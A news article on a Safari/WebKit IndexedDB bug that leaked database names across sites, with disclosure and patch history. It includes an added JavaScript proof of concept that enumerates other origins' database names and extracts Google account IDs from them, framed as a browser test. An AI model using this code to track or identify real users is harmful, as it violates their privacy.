Safari bug lets websites track browsing activity and unique identifiers
The flaw, found in Apple's WebKit browser engine, affects Safari 15 on macOS and every browser on iOS and iPadOS 15, because Apple requires all browsers on those platforms to use WebKit
Researchers have found a bug in Apple's Safari browser that allows websites to track a user's browsing activities across other sites.
The bug, discovered by browser fingerprinting service FingerprintJS, also exposes a user's unique ID for some websites to other sites that they visit.
When properly implemented, IndexedDB follows the same-origin policy: data stored by a web page is available only to pages from the same origin (the same scheme, host and port). That stops an over-inquisitive page from reading, or even learning about, the storage of other origins, which could include sensitive user or session data.
FingerprintJS found that WebKit's IndexedDB implementation fails to observe the same-origin policy: the names of databases created by one origin become visible to pages from every other origin open in the same browser session. The contents of those databases are not exposed, but the names alone turn out to be enough to track users.
FingerprintJS called the bug a privacy violation. "It lets arbitrary websites learn what websites the user visits in different tabs or windows," the company said in its analysis of the bug. "This is possible because database names are typically unique and website-specific."
The company found that some websites embed user-specific values, such as account ID numbers, in the names of their IndexedDB databases, so any other site can read a user's ID for those services. Looking that ID up against assets tied to it (a profile picture, for example) could identify the user, the company warned. Google's websites store account ID numbers in this way, so other sites can harvest Google IDs through the bug.
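The following is an added example, not FingerprintJS's demo code or anything from Apple, showing how the leak described above is probed from two origins and how a leaked name is turned into a user identifier. The marker prefix, the two origins a.example and b.example, and the shape of the Google database name (a site-specific prefix followed by the numeric account ID) are all assumptions made for the example.

```javascript
// Added example (not FingerprintJS's or Apple's code): a two-origin probe for the
// WebKit IndexedDB name leak, plus the pure matching logic that runs under Node.
// Assumptions: the marker prefix, the two origins, and the shape of the Google
// database name (a site-specific prefix followed by the numeric account ID).

const MARKER_PREFIX = 'safari-leak-probe-';

// Origin A (assume https://a.example): create an empty database with a unique
// name. Its contents never leave this origin, but on an unpatched WebKit the
// *name* shows up in indexedDB.databases() on every other open origin.
function createMarkerDatabase(idb = globalThis.indexedDB) {
  return new Promise((resolve, reject) => {
    const name = MARKER_PREFIX + Math.random().toString(36).slice(2);
    const req = idb.open(name, 1);
    req.onupgradeneeded = () => req.result.createObjectStore('noop');
    req.onsuccess = () => { req.result.close(); resolve(name); };
    req.onerror = () => reject(req.error);
  });
}

// Name patterns that carry a user identifier. The Google entry is an assumed
// shape, used only to show how a leaked name yields an account ID.
const ID_PATTERNS = [
  { site: 'google', re: /^LogsDatabaseV2:(\d+)\|\|$/ },
];

// Pure logic: given the names an origin can see, separate our own probe
// markers from names that belong to other sites and carry identifiers.
function classifyLeakedNames(names) {
  const markers = [];
  const identifiers = [];
  for (const name of names) {
    if (name.startsWith(MARKER_PREFIX)) {
      markers.push(name);
      continue;
    }
    for (const { site, re } of ID_PATTERNS) {
      const m = re.exec(name);
      if (m) identifiers.push({ site, id: m[1], name });
    }
  }
  return { markers, identifiers, leaked: markers.length > 0 || identifiers.length > 0 };
}

// Origin B (assume https://b.example, open in another tab while A runs):
// enumerate every database name the engine exposes and classify it.
// A correct same-origin implementation returns only B's own databases.
async function probeFromOtherOrigin(idb = globalThis.indexedDB) {
  if (!idb || typeof idb.databases !== 'function') {
    return { supported: false }; // no enumeration API: cannot probe this way
  }
  const names = (await idb.databases()).map((d) => d.name).filter(Boolean);
  return { supported: true, ...classifyLeakedNames(names) };
}

// Constructed samples of what origin B might see on a patched and on an
// unpatched engine (not captured from a real browser).
const SAMPLE_PATCHED = ['b-app-cache'];
const SAMPLE_UNPATCHED = [
  'b-app-cache',
  'safari-leak-probe-k3j9xq2',
  'LogsDatabaseV2:1234567890||',
];
```

To test a browser, load a page on origin A that calls `createMarkerDatabase()`, then, in another tab, a page on origin B that calls `probeFromOtherOrigin()`; a result with `leaked: true` means B can see A's marker (or a third site's identifier-bearing name) and the engine is affected. Outside a browser `probeFromOtherOrigin()` reports `supported: false`, and only `classifyLeakedNames` runs.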
FingerprintJS said it had notified Apple of the bug on November 28, 2021, but Apple had not patched it by the time the analysis was published on January 14, 2022. Apple's engineers began working on a WebKit patch on Sunday, January 16, two days after publication; the fix shipped in Safari 15.3 and in iOS and iPadOS 15.3.